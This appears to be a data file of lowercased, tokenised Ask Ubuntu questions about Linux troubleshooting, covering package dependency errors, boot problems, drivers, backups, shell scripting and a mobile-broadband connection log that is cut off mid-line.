408753	installation / uninstallation does n't work	when executing sudo apt-get install or similar commands , i 'm getting this message : you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : postgresql-client-9.1 : breaks : postgresql-9.1 ( < 9.1.11-1.pgdg12.4+1 ) but 9.1.10-1.pgdg12.4+1 is to be installed postgresql-contrib-9.1 : depends : postgresql-9.1 ( = 9.1.11-1.pgdg12.4+1 ) but 9.1.10-1.pgdg12.4+1 is to be installed synaptic : depends : libvte9 ( > = 1:0.24.0 ) but it is not going to be installed recommends : rarian-compat but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . ubuntu software center and update manager dont't work either - software center keeps trying to repair , but it is never succesful , apt-get -f install does n't help ( the repairing is cancelled because of those packages ) . all error messages has something to do with these packages . is there something i can do to get it working ? edit : output after 'apt-get install -f ' : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following package was automatically installed and is no longer required : libkrb5-dev use 'apt-get autoremove ' to remove them . the following extra packages will be installed : postgresql-9.1 suggested packages : oidentd ident-server locales-all the following packages will be upgraded : postgresql-9.1 1 upgraded , 0 newly installed , 0 to remove and 256 not upgraded . 4 not fully installed or removed . need to get 0 b/3,629 kb of archives . after this operation , 10.2 kb of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of postgresql-9.1 : postgresql-client-9.1 ( 9.1.11-1.pgdg12.4+1 ) breaks postgresql-9.1 ( < < 9.1.11-1.pgdg12.4+1 ) and is installed . version of postgresql-9.1 to be configured is 9.1.10-1.pgdg12.4+1 . dpkg : error processing postgresql-9.1 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of postgresql-9.1-postgis-2.0 : postgresql-9.1-postgis-2.0 depends on postgresql-9.1 ; however : package postgresql-9.1 is not configured yet . dpkg : error processing postgresql-9.1-postgis-2.0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of postgresql-9.1-pgrouting : postgresql-9.1-pgrouting depends on postgresql-9.1-postgis-2.0 | postgresql-9.1-postgis ; however : package postgresql-9.1-postgis-2.0 is not configured yet . package postgresql-9.1-postgis is not installed . dpkg : error processing postgresql-9.1-pgrouting ( -- configure ) : dependency probno apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because maxreports is reached already lems - leaving unconfigured dpkg : dependency problems prevent configuration of postgresql-contrib-9.1 : postgresql-contrib-9.1 depends on postgresql-9.1 ( = 9.1.11-1.pgdg12.4+1 ) ; however : version of postgresql-9.1 on system is 9.1.10-1.pgdg12.4+1 . dpkg : error processing postgresql-contrib-9.1 ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : postgresql-9.1 postgresql-9.1-postgis-2.0 postgresql-9.1-pgrouting postgresql-contrib-9.1 e : sub-process /usr/bin/dpkg returned an error code ( 1 )
408756	tar extract error - implausibly old time stamp 1970-01-01 01:00:00	i was create a tar script to make a backup of / directory on flash drive with exluding these folders : /lost+found /mnt /media /proc /sys /tmp here 's a fragment of script : sudo tar -zcpf $ backup_dir/ $ now/backup.tar.gz / -- exclude=/lost+found/* -- exclude=/mnt/* -- exclude=/media/* -- exclude=/proc/* -- exclude=/sys/* -- exclude=/tmp/* and it was done without any errors , but when i wanted to restore this to test location to check that script is correct the screen shows information below tar : boot : implausibly old time stamp 1970-01-01 01:00:00 here is a fragment of untar script sudo tar -xzpf $ backup_source/ $ data/backup.tar.gz -c /home/pi/test my problem is with unzip file to test location . os : raspbian ( on raspberry pi ) based on debian what i must do to unzip file correctly to directory /home/pi/test ?
408758	grub not working after installation	i 've installed ubuntu choosing `` alongside windows 7 '' option . after installation windows boots , there is no grub menu . i 've tried : - setting bootable flag to linux partition using cfdisk - chrooting to linux partition and running `` grub-install '' none helped . how can i boot my new system ?
408759	interface for my router in ubuntu	i would like to know if there is a way in which i can create an interface in my ubuntu 12.04 lts desktop for my router . my goal : i want to tcpdump the ip address of the router which is 192.168.1.1. new-eth1-for router hwaddr xx : xx : xx : xx : xx : xx inet addr:192.168.1.1 bcast:192.168.1.255 eth0 link encap : ethernet hwaddr 00:22:68:36 : aa:05 inet addr:192.168.1.101 bcast:192.168.1.255 mask:255.255.255.0 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 as you can see in the table above my computer : 192.168.1.101 my router : 192.168.1.1 localhost : 127.0.0.1 ( i need it for mysql and php ) i just want to know if there is a way to work this `` monitoring '' thing . if anybody has another suggestion or solution , please do not hesitate , i just want to hear a hint . thank youmy regards
408762	dual boot with windows 7 and ubuntu , wireless network driver not working in windows	i have a clevo w230st with two msata ssds . windows 7 is installed on one and ubuntu on the other . after installing ubuntu and with everything working perfect on the ubuntu side of things . when i boot windows my wireless network card stops working . the card is a qualcomm killer 1202 . i have tried both 12.04 and 13.10 to see if i have the same problem . i have tried uninstalling and reinstalling the drivers in windows , after the install the card works fine until i restart , when it asks me . my grub bootloader is on the ssd with ubuntu thank you for any help
408763	why would usb ports that work using a live cd not work on an install of ubuntu 13.10 on a dell 15r ?	i installed the ubuntu 13.10 in my dell inspiron 15r . everything worked fine while using a live cd but once ubuntu was installed the usb ports did n't work with several devices . what steps can i take to find out why , or to get the devices working ? bus 002 device 003 : id 0cf3 : e004 atheros communications , inc . bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 0c45:648d microdia bus 001 device 003 : id 0bda:0129 realtek semiconductor corp. rts5129 card reader controller bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub edit : updated the output of lsusb
408764	increase linux partion size ( file system )	i have have a message today that say i need to increase my file system size in ubuntu /dev/sda12 4797600 4233236 297612 94 % / hear is current condition of my ubuntu file system partition . can anyone tell me a how to increase sda12 partition size .
408765	gui fails to show up both in 'try ubuntu ' ( live-session ) and after-installing [ ubuntu-gnome13.10 ]	i have downloaded and burned ubuntu-gnome 13.10 amd64 on a dvd . it booted straight into the live session ( uefi-off in my motherboard settings ) . everything works as it should until i 'm asked to choose between 'try ubuntu ' and 'install' if i choose 'try ubuntu ' the gui does not show up , and i find myself at the command-line interface after some seconds . if i pick 'install ' , everything works fine , installation gets successfully completed . but then at the next boot , it wo n't load the gui and i 'm stuck again at the cli . forgot to mention : i 've tried to manually start the gui but it does n't work . this is my hardware : amd fx-6300 , 8gb ddr3 ram , motherboard asus m5a97 r2.0 , amd hd7790 . ( never had this kind of problem with the standard-ubuntu-unity or kubuntu ) xorg.0.log please let me know whatever information to include if useful ; and how to gather it . thank you !
408766	super key does not invoke activities in gnome shell 3.8	pressing the super key does not launch the activities , although the hot key to the top left corner to activate activities do work . i tried following the link here but the solution there does not work for me . i am running ubuntu 13.10 , gnome 3.8 shell . i had a similar issue with unity few days back but i resolved that via unity plugin in ccsm .
408769	uptime shows no output for non-privileged users	i have a 12.04lts system where the uptime command produces no output when run by a normal ( that is , not root , ) user : bbx @ bard : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise bbx @ bard : ~ $ id uid=1000 ( bbx ) gid=1000 ( bbx ) groups=1000 ( bbx ) ,4 ( adm ) ,24 ( cdrom ) ,27 ( sudo ) ,30 ( dip ) ,46 ( plugdev ) ,111 ( lpadmin ) ,112 ( sambashare ) bbx @ bard : ~ $ w 10:42:56 up 21 days , 21:31 , 1 user , load average : 0.00 , 0.01 , 0.05 user tty from login @ idle jcpu pcpu what root pts/0 redacted 10:35 0.00s 0.35s 0.00s w bbx @ bard : ~ $ uptime bbx @ bard : ~ $ echo $ ? 0 also ... bbx @ bard : ~ $ ls -l /proc/uptime /proc/loadavg -r -- r -- r -- 1 root root 0 jan 21 12:57 /proc/loadavg -r -- r -- r -- 1 root root 0 jan 21 12:57 /proc/uptime and strace output is available from pastebin . meanwhile , uptime works fine , ( output matches the w ( 1 ) command , ) when invoked by root : root @ bard : ~ # id uid=0 ( root ) gid=0 ( root ) groups=0 ( root ) root @ bard : ~ # uptime 10:45:49 up 21 days , 21:34 , 1 user , load average : 0.00 , 0.01 , 0.05 anyone know why ?
408770	creating functional live usb	so i think i have done everything good . set up so that usb has first boot priority , installed everything on my usb stick so everything would be like on disk : but i am getting this message when i try to power up my computer with usb stick attached any toughs what could be wrong ? p.s . i am using very old computer , could it be hardware 's problem ?
408774	can cd into folder but i ca n't see it with ls or ls -a ?	i 've a shared partition between windows and ubuntu , achieved through vmware 's shared folders , and when i moved a folder into this shared folder ubuntu could n't see it . ubuntu still ca n't see it , but it can access it from the terminal . it can access it from the terminal but can not list the files with ls or ls -a . the screenshot linked below demonstrates the issue . despite this , any files that ubuntu puts in the folder are entirely visible by windows . how can i further debug the problem ? the output from ls -l /mnt/hgfs/f is : calem @ ubuntu : /mnt/hgfs/f $ ls -l /mnt/hgfs/f ls : can not access /mnt/hgfs/f/screenshot from 2014-01-21 10^ % 42^ % 49.png : no such file or directory ls : can not access /mnt/hgfs/f/system volume information : permission denied total 4 drwxrwxrwx 1 root root 0 jan 20 16:54 github drwxrwxrwx 1 root root 4096 jan 21 00:00 school - ? ? ? ? ? ? ? ? ? ? ? ? ? ? screenshot from 2014-01-21 10^ % 42^ % 49.png d ? ? ? ? ? ? ? ? ? ? ? ? ? ? system volume information drwxrwxrwx 1 root root 0 jan 20 22:19 virtual machines note the screen shot png is the linked screen shot that i put in there from ubuntu after posting the initial question ( it 's the shot used in this post ) .
408775	add seconds to a given date in bash	i have a complete date plus hours and minutes . i would like to add a number of seconds and display the result as a date `` day.month.year hour : minute '' . `` date '' does n't seem to be able to add seconds to a given date . best regards and thanks in advance , markus
408780	mountall : plymouth command failed	i 'm freezing up before making it to the login gui screen . ubuntu 12.04 installed on an asus zenbook vd32 , no windows . after ubuntu begins to boot i get a blank screen with the following flashing messages : mountall : plymouth command failed mountall : disconnected from plymouth speech-dispatcher diabled edit /etc/default/speech-dispatcher saved disabled ; edit /etc/default/saved *starting apache 2 web server apache 2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for server name *checking battery state ... . if anyone would be willing to talk me through fixing this , preferably without wiping my hard drive clean , i would appreciate it .
408781	setting up ubuntu for netflix dns	i 've got a server in the u.s. running ubuntu 12.04 . i 'm located in denmark . is it possible to setup my ubuntu server as dns server , so i can use netflix with u.s. content ? i 've read it should be legal .
408784	after doing a sudo apt-get install < app > , where does the application get stored to ?	after installing apps via apt-get install -app name- . where does the files get copied to ? are the copied to just one location or multiple locations ? and if so how do i find this out ? here 's an example :
408787	pulseaudio all volumes set to 100 %	it happens when flat volumes = no . when pulseaudio daemon is starting , it set all volumes to 0db . on logon screen my speakers sounds like `` boom ! '' it is not as annoying to change them every time as changing mic , monitor etc volumes as well . also i ca n't use enabled flat volumes because i want independent global volume , if you know what i mean . possibly workaround : i made simple script that using commands `` set-source-volume '' and `` set-sink-volume '' . would be great if someone tell me the nice place for autostart these commands when daemon starts . update : can i add this script to /etc/init.d/pulseaudio file ?
408792	.sh not running and getting no errors	i am try to create a .sh file to check to see if the server is running and if not to start it . i am not getting any echo 's from this script or any fails but it is not running . can some one help me fix this or a better way to right it . i am not a programmer i just edited a few others scripts to get this . java= '' java -xms512m -xmx3072m -xx : permsize=128m -jar ftbserver.jar nogui '' dir= '' /home/jon/ftb/ftbnew '' if [ `` $ 1 '' = start ] ; then if ps -ef | grep ftbserver.jar | grep -v -q grep ; then echo `` minecraft is already running '' else echo `` starting ! '' & & cd $ dir & & screen -dms minecraft $ java sleep 7 if ps -ef | grep minecraft_server.jar | grep -v -q grep ; then echo `` minecraft server started successfully '' else echo `` minecraft server failed to start '' fi fi fi this is what i get and when i run it root @ ftb : /home/jon/ftb/ftbnew # bash check.sh root @ ftb : /home/jon/ftb/ftbnew #
408808	no such file or directory as on /usr/lib/sendmail ( ubuntu )	i did many attempts to send mail using mail command as follows : abdennour @ pc : mail -v abd.tm @ gmail.com subject : hello world ! this is an email to myself . hope all is well . . cc : i get this error message : /usr/lib/sendmail : no such file or directory '' /home/abdennour/dead.letter '' 9/261 . . . message not sent .
408811	gnome config customisations do not persist after 12.04 to 13.10 upgrade	i recently upgraded from 12.04lts to 13.10 . i 'm using the gnome/metacity combination as a desktop rather than unity , and the actual upgrade seemed to go okay - except for some driver issues . however , changing my gnome settings using gconftool or gconf-editor or dconftool will cause all existing settings to disappear . so for instance if i use it to change my theme - the settings for the desktop toolbars will disappear and they 'll both appear blank after a re-login . if i then go into .config and delete the .dconf directory , then settings will return to their default - again after a re-login . i presume there must be some precedence order in which the files are loaded for preferences and user file in this case is created without the default settings - so effectively only the one preference set up in the user file is actually used .
408812	download does not start while upgrading using ubuntu software centre ?	i go on ubuntu software centre and try to download additional software . the download does not start.please give me soln . upgrading is also not working music plyer codec are also not downloading .
408817	graphics problems when running battlefield 2 with playonlinux	so i want to run battlefield 2 on my kubuntu machine and i found this guide on installing . i did so , the only differences are that i 'm using wine version 1.6.2 ( latest stable ) and the fact that i did not install any patch . when i start the game , everything works like a charm , until i try to play : with default settings , the game then looks like this ( it 's the screen where one has to select a spawn point i guess ) : http : //tinypic.com/r/2rcv6ae/5 i also ca n't see the mouse cursor although i am able to select something as i hear responsive sounds when moving the mouse in certain directions . interestingly , sound is okay , i 'm also able to press escape and get to the pause screen where everything looks normal . i have to add that i 'm using a machine with intel hd 3000 integrated graphics which are not very powerful , but more than enough to run this old game ( at least on minimal settings ) .
408818	ubuntu 13.10 boot to a purple screen soon after installation completed	after the install of ubuntu 13.10 desktop , using a liveusb finished correctly , it boots to a purple screen , and that 's it . what to do ?
408820	eclipse svn fail to show history	in ubuntu 13.10 after system updates ( probably java update ) svn ( svnkit ) suport in eclipse goes wrong i can do update or commit but i try compare with latest from repository or try to show history from repository eclipse generate error : resource doesn not exists the selected resorce does not exists in the head revisions of the repository and requested operations will be limited by the working copy revisions . yes/no ... after yes i will see next error svn : file not found : revision 3210 , path '/myproject/myprocject' i think that is problem because paths in all svn project are doubled ( /myproject to /myproject/myproject or /myshel to /myshel/myshel ) problem is that this corrupted path are in all project ( i did n't do anything ) next problem is that is impossible to add new svn project , because at selecte svn source doubles path again and ends with an error occurred ... and finally i try to new ubuntu ( system ) instaltion and instalation eclipse and error is still here . and for crying in windows same settings work normaly .
408821	rtl8188ru usb wireless card issue	i bought a usb wireless card with rtl8188ru chipset . and i use it with ubuntu 12.04.3 . but it only can scan ssids . the connection is always failed . then i found that build-in driver rtl8192cu is buggy from google . so i install official realtek driver 4.0.2_9000 successfully . also add rtl8192cu to blacklist and add 8192cu to /etc/modules but the problem is still the same . there are some errors in dmesg . [ 32174.031125 ] link to new ap [ 32174.328532 ] link_timer_hdl : auth timeout and try again [ 32174.631246 ] link_timer_hdl : auth timeout and try again [ 32174.934012 ] link_timer_hdl : auth timeout and try again [ 32175.236757 ] link_timer_hdl : auth timeout and try again [ 32175.539467 ] report_join_res ( -1 ) these errors shows even the wifi is open without password . information from lsusb . bus 001 device 003 : id 0bda:817f realtek semiconductor corp . anyone could help ? thanks
408822	error while finding java version on ubuntu	i recently messed up badly in eclipse , so was doing some digging to update/fix jdk . while executing java -version to find java version on my ubuntu 12.04 , i get the below error and even on following sudo apt-get install < selected package > for any of the packages , the problem persists ! ! the program 'java ' can be found in the following packages : * default-jre * gcj-4.6-jre-headless * openjdk-6-jre-headless * gcj-4.5-jre-headless * openjdk-7-jre-headless try : sudo apt-get install can any one tell me what does this mean and what is needed to be done to correct it , could n't find much on internet about this ! ! ps : i have executed sudo apt-get install openjdk-7-jre-headless and it tells that : openjdk-7-jre-headless is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . so jre is there somewhere ... .what 's the bug then ? ? ? ? ? why asking this question because eclipse is throwing this error and i need to fix jre/jdk to run it but i am total noob in this ! ! a java runtime environment ( jre ) or java development kit ( jdk ) must be available in order to run eclipse . no java virtual machine was found after searching the following locations : /usr/lib/eclipse/jre/bin/java java in your current path i was not able to login to my ubuntu account so asked the same question on so first ! ! !
408823	search specific text from file and output the line ( shell script )	suppose i have a variable $ str1 str1= '' 20140121-21:48:26|joanne frances| '' what i want to do is search that part in the file . the file contains , for example : 20140121-21:48:26|joanne frances|perez|9173046751.000000|mar 31| 20140121-21:50:28|nikko|real|9065887272.000000|mar 21| 20140121-22:22:53|czarina|revilla|9999999999.000000|jan 21| the output should be : 20140121-21:48:26|joanne frances|perez|9173046751.000000|mar 31| update : finally know what the heck is the problem tried to echo $ str1 and it outputs 20140121|adrian perez| meaning it really is n't in the file . haaa ! i 'm such a mess ! -_-
408827	app that is rude to you if you mistype your password	there 's an app , that when you type your password incorrectly in terminal it responds with something cheeky or downright rude . what 's the name of the app ?
408830	how to make an automated installation package from compiling ?	in this scenario i am looking at twister and at the moment you can only compile twister . how would one start making this installation process automaticly ? twister is the fully decentralized p2p microblogging platform leveraging from the free software implementations of bitcoin and bittorrent protocols .
408835	system hangs after wubi install	i just installed ubuntu on a windows 7 machine using wubi . when i rebooted , the display showed a blank black screen . i waited about 15m and then powered down . when i powered back up , i 'm given the option of windows 7 or ubuntu . while selecting windows 7 works fine , ubuntu returns me to the blank black screen . i 've waited about 10m after this , no change . any suggestions ? thanks so much !
408837	keyboard touchpad not working	i have installed and updated from 13.04 to 13.10 last week ( new installation ) , and all was running perfect , but suddenly my keyboard does n't work anymore , not even the touchpad . both where ok a few minutes ago . the only change i did was : sudo apt-get install ubuntu-restricted-extras a page of terms was on the screen , and the keyboard just did n't worked , so i just closed the terminal and reboot . with a usb keyboard i 've installed them , but there 's no way , not even on the grub ( i have a windows 7 installation ) , not in the live cd ... it 's retroiluminated , so i 'm sure it gets power . any suggestion ? thanks !
408838	fujitsu lh532 touchpad detected as ps/2 generic mouse	virtual core pointer id=2 [ master pointer ( 3 ) ] ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ↳ pixart usb optical mouse id=12 [ slave pointer ( 2 ) ] ↳ ps/2 generic mouse id=15 [ slave pointer ( 2 ) ] virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ fujitsu fuj02e3 id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ fujitsu fuj02b1 id=9 [ slave keyboard ( 3 ) ] ↳ video bus id=10 [ slave keyboard ( 3 ) ] ↳ power button id=11 [ slave keyboard ( 3 ) ] ↳ fj camera id=13 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=14 [ slave keyboard ( 3 ) ] can someone help me ?
408841	`` warning : ca n't have a partition outside the disk '' when i try to plug an external hdd-usb	i installed ubuntu 13.10 in a dual boot with my existing windows 7 . had some drive issues and decided to remove ubuntu . then found it messed up the mbr on my hdd and can not boot from the drive , only from a thumb drive . so since i wanted a larger internal drive , i bought a 1tb internal drive and installed it in my laptop . i installed win 7 from my restore disks , created 2 additional partitions for ubuntu and storage . i bought a usb to ide/sata cable kit with the intention of recovering my data from my 320gb laptop drive , then formatting it and using it for backups . i can not use the drive in windows , it thinks it needs to be formatted . in ubuntu , here is what i get : disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x303b2099 device boot start end blocks id system /dev/sda1 * 63 994727343 497363640+ 7 hpfs/ntfs/exfat partition 1 does not start on physical sector boundary . /dev/sda2 994727934 1953523711 479397889 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 1035689984 1953523711 458916864 83 linux /dev/sda6 994727936 1035689983 20481024 83 linux partition table entries are not in disk order note : sector size is 4096 ( not 512 ) fdisk : unable to seek on /dev/sdb : invalid argument i can not seem to mount the drive to retrieve my valuable data from it . gparted shows a warning and the message reads `` warning : ca n't have a partition outside the disk '' can anyone help me get this disk readable so i can recover my data ?
408842	php and mysql issues	i 've recently read wallace wang 's “beginning programming for dummies , 7 books in 1” and found it to be very enlightening , as it highlighted various differences between the three main operating systems of linux , mac and microsoft ; and thought php would be as good a starting point to start with and chose “head first , php & mysql” in the o'reily library . problem , it only describes the set up and installation of lamp server for microsoft and mac and i 'm unable to do the exercises , in chapter one . as i failed to set up lamp , on several occasions using the links and other prescribed methods in this forum . i get to “look it works” on the browser , when you restart apache , then enter the code lines to obtain the php display page , after reading a long message , which tells me certain facets of the php install were deprecated , do you want to continue , “y or n” the terminal goes blank upon typing “y” and followed by a series of new lines starting with a comma , ending with a red line message “e353 : nothing in register” . entering “php -version” or “mysql -version” commands in the terminal , it informs me i do not have either installed , but gives the option to install either with the following “sudo apt-get install php5-cli” or “sudo apt-get install mysql-client-core-5.5 ” commands . though apache comes with multiple choice ? sort of grasp why there is nought in the register . security issues , i was informed to enter a new password for mysql , then re-enter , went with my computer root command password . by the third or fourth attempt i used a new password for mysql . boy that cooked the system . delete and re-installed 12.04 . the system only recognises the 127.0.0.1 , which it did n't like either , and i could n't find an option to enter my ip localhost.com , shown on the example graphic or the preferred 192.168.00.000 modified address used in other examples . is “head first , php & mysql” still the best way forward for ubuntu 12.04 , if not can you recommend.. ! would it be prudent to download php , mysql and apache using the sudo apt-get install command first , then attempt the set up using “tasksel” , which is now installed . feeling like a numpty and totally lost .
408846	deregister callback in pulseaudio	pulseaudio is uses event driven approach . it need to register multiple callbacks . but in my project i need to unregister some callback on event ( not all ) . so anybody know how to deregister callbacks in pulseaudio api ? ? thanks in advance ..
408854	print dialog : how to disable sorting of pages ( in 1 copy )	i want to print a pdf in a specific order but i think ubuntu automatically sorts the pages which i choose . for example if i want to try to print 2 pages on both sides of a sheet ( 4 pages total like a book or pamphlet ) and i type 1,4,3,2 , he still prints 1,2,3,4 . is there a way around this ? if it would be possible through a command from some java-code it would be nice too .
408855	purple screen with ubuntu in white letters during boot	ubuntu wo n't let me type my passphrase and the screen is frozen , with the letters ubuntu on the screen ? does someone have a solution ? this is the first time i am installing an os , so could you be explicit in your answer .
408856	difficulty dual booting with windows xp	i have just downloaded ubuntu onto usb stick . when rebooting computer i get to where there is option of using windows or ubuntu , but can not highlight ubuntu . can anyone help please ?
408857	ubuntu 12.04.4 lts my tmp directory is filling up with script files	i just installed ubuntu 12.04.4 last week . today i checked my /tmp directory and was absolutely shocked to find that this partition was filled with files that have this type of naming structure : -rwxr -- r -- 1 root root 21 jan 20 17:30 13902606011019354137.sh -rwxr -- r -- 1 root root 23 jan 20 17:30 13902606011071244358.sh -rwxr -- r -- 1 root root 23 jan 20 17:30 13902606012086881425.sh -rwxr -- r -- 1 root root 21 jan 20 17:30 13902606013180074572.sh -rwxr -- r -- 1 root root 96 jan 20 17:31 13902606871535803856.sh -rwxr -- r -- 1 root root 55 jan 20 17:31 13902606871812064602.sh -rwxr -- r -- 1 root root 21 jan 20 18:00 13902624011030533764.sh inside each of the files are short scripts that look like this : me @ beowulf : ~ $ more /tmp/13903290382226612338.sh # ! /bin/bash cat /proc/mounts | awk ' { print $ 2 } ' | grep '/mnt/timeshift ' | sort -r | xargs umount me @ beowulf : ~ $ more /tmp/13903290381040945399.sh # ! /bin/bash crontab -l | sed '/timeshift/d ' | crontab - me @ beowulf : ~ $ more /tmp/13903290013868504141.sh # ! /bin/bash df -t -bm me @ beowulf : ~ $ more /tmp/13903290013097573480.sh # ! /bin/bash /sbin/blkid the /sbin/blkid command is found in over 50 % of the scripts in this directory ... how can i find out where these are coming from , and how i can stop them from filling up my /tmp directory and partition ? i know i can flush them by rebooting , but i should n't have them filling up my tmp directory to begin with ? any ideas ?
408862	can i run after effects in ubuntu ?	well guys , i 'm wanting to change the operating system , leave the windows and jump right in linux , and i went back and found nearly all programs , or programs similar to the same function in ubuntu . has only one i need and can not find any way , i need a video editor like after effects of adobe . so i wonder if a program with the same power of ae exist or if there is any way to run the ae ( aflter effects ) on ubuntu ?
408863	mobile broadband do not work with thinkpad t440p on ubuntu 13.10	i have a new lenovo t440p with built in mobile broadband a lenovo n5321gw ( i 'm guessing its a rebranded ericsson h5321gw ) . ubuntu detects it fine and i can configure it and give the pin-code . but as soon as i press connect it try to connect and then fails with this in the log : jan 21 19:13:36 maximus kernel : [ 54.432298 ] usb 3-10 : new high-speed usb device number 8 using xhci_hcd jan 21 19:13:36 maximus kernel : [ 54.449019 ] usb 3-10 : new usb device found , idvendor=0bdb , idproduct=193f jan 21 19:13:36 maximus kernel : [ 54.449022 ] usb 3-10 : new usb device strings : mfr=1 , product=2 , serialnumber=5 jan 21 19:13:36 maximus kernel : [ 54.449024 ] usb 3-10 : product : n5321 gw jan 21 19:13:36 maximus kernel : [ 54.449025 ] usb 3-10 : manufacturer : lenovo jan 21 19:13:36 maximus kernel : [ 54.449027 ] usb 3-10 : serialnumber : 44******** jan 21 19:13:36 maximus pppd [ 2782 ] : exit . -- - pressing connect here -- - jan 21 19:14:26 maximus kernel : [ 104.463741 ] usbhid 3-10:1.0 : ca n't add hid device : -110 jan 21 19:14:26 maximus kernel : [ 104.463772 ] usbhid : probe of 3-10:1.0 failed with error -110 jan 21 19:14:26 maximus kernel : [ 104.463895 ] usb 3-10 : usb disconnect , device number 8 jan 21 19:14:26 maximus kernel : [ 104.703794 ] usb 3-10 : new high-speed usb device number 9 using xhci_hcd jan 21 19:14:26 maximus kernel : [ 104.722786 ] usb 3-10 : new usb device found , idvendor=0bdb , idproduct=193e jan 21 19:14:26 maximus kernel : [ 104.722800 ] usb 3-10 : new usb device strings : mfr=1 , product=2 , serialnumber=3 jan 21 19:14:26 maximus kernel : [ 104.722808 ] usb 3-10 : product : n5321 gw jan 21 19:14:26 maximus kernel : [ 104.722815 ] usb 3-10 : manufacturer : lenovo jan 21 19:14:26 maximus kernel : [ 104.722821 ] usb 3-10 : serialnumber : 44************ jan 21 19:14:26 maximus kernel : [ 104.756813 ] cdc_acm 3-10:1.1 : ttyacm0 : usb acm device jan 21 19:14:26 maximus kernel : [ 104.760797 ] cdc_acm 3-10:1.3 : ttyacm1 : usb acm device jan 21 19:14:26 maximus kernel : [ 104.768804 ] cdc_wdm 3-10:1.5 : cdc-wdm1 : usb wdm device jan 21 19:14:26 maximus kernel : [ 104.796140 ] cdc_mbim 3-10:1.6 : cdc-wdm2 : usb wdm device jan 21 19:14:26 maximus kernel : [ 104.796491 ] cdc_mbim 3-10:1.6 wwan0 : register 'cdc_mbim ' at usb-0000:00:14.0-10 , cdc mbim , ce : bc:1e:4a : d7:9f jan 21 19:14:26 maximus kernel : [ 104.797298 ] cdc_wdm 3-10:1.8 : cdc-wdm3 : usb wdm device jan 21 19:14:26 maximus kernel : [ 104.797767 ] cdc_acm 3-10:1.9 : ttyacm2 : usb acm device jan 21 19:14:26 maximus mtp-probe : checking bus 3 , device 9 : `` /sys/devices/pci0000:00/0000:00:14.0/usb3/3-10 '' jan 21 19:14:26 maximus mtp-probe : bus : 3 , device : 9 was not an mtp device jan 21 19:14:26 maximus networkmanager [ 902 ] : scplugin-ifupdown : devices added ( path : /sys/devices/pci0000:00/0000:00:14.0/usb3/3-10/3-10:1.6/net/wwan0 , iface : wwan0 ) jan 21 19:14:26 maximus networkmanager [ 902 ] : scplugin-ifupdown : device added ( path : /sys/devices/pci0000:00/0000:00:14.0/usb3/3-10/3-10:1.6/net/wwan0 , iface : wwan0 ) : no ifupdown configuration found . jan 21 19:14:26 maximus modem-manager [ 846 ] : < info > ( ttyacm1 ) opening serial port ... jan 21 19:14:26 maximus modem-manager [ 846 ] : < info > ( ttyacm0 ) opening serial port ... jan 21 19:14:26 maximus modem-manager [ 846 ] : < info > ( ttyacm2 ) opening serial port ... jan 21 19:14:30 maximus modem-manager [ 846 ] : < info > ( ttyacm1 ) closing serial port ... jan 21 19:14:30 maximus modem-manager [ 846 ] : < info > ( ttyacm1 ) serial port closed jan 21 19:14:30 maximus modem-manager [ 846 ] : < info > ( generic ) : gsm modem /sys/devices/pci0000:00/0000:00:14.0/usb3/3-10 claimed port ttyacm1 jan 21 19:14:30 maximus modem-manager [ 846 ] : < info > ( ttyacm0 ) closing serial port ... jan 21 19:14:30 maximus modem-manager [ 846 ] : < info > ( ttyacm0 ) serial port closed jan 21 19:14:30 maximus modem-manager [ 846 ] : < info > ( generic ) : gsm modem /sys/devices/pci0000:00/0000:00:14.0/usb3/3-10 claimed port ttyacm0 jan 21 19:14:30 maximus modem-manager [ 846 ] : < info > ( ttyacm2 ) closing serial port ... jan 21 19:14:30 maximus modem-manager [ 846 ] : < info > ( ttyacm2 ) serial port closed jan 21 19:14:30 maximus modem-manager [ 846 ] : < info > ( generic ) : gsm modem /sys/devices/pci0000:00/0000:00:14.0/usb3/3-10 claimed port ttyacm2 jan 21 19:14:30 maximus modem-manager [ 846 ] : < info > ( ttyacm0 ) opening serial port ... jan 21 19:14:30 maximus networkmanager [ 902 ] : < warn > ( ttyacm0 ) : failed to look up interface index jan 21 19:14:30 maximus networkmanager [ 902 ] : < info > wwan now disabled by management service jan 21 19:14:30 maximus networkmanager [ 902 ] : < info > ( ttyacm0 ) : new gsm/umts device ( driver : 'cdc_acm ' ifindex : 0 ) jan 21 19:14:30 maximus networkmanager [ 902 ] : < info > ( ttyacm0 ) : exported as /org/freedesktop/networkmanager/devices/3 jan 21 19:14:30 maximus networkmanager [ 902 ] : < info > ( ttyacm0 ) : device state change : unmanaged - > unavailable ( reason 'managed ' ) [ 10 20 2 ] jan 21 19:14:30 maximus networkmanager [ 902 ] : < info > ( 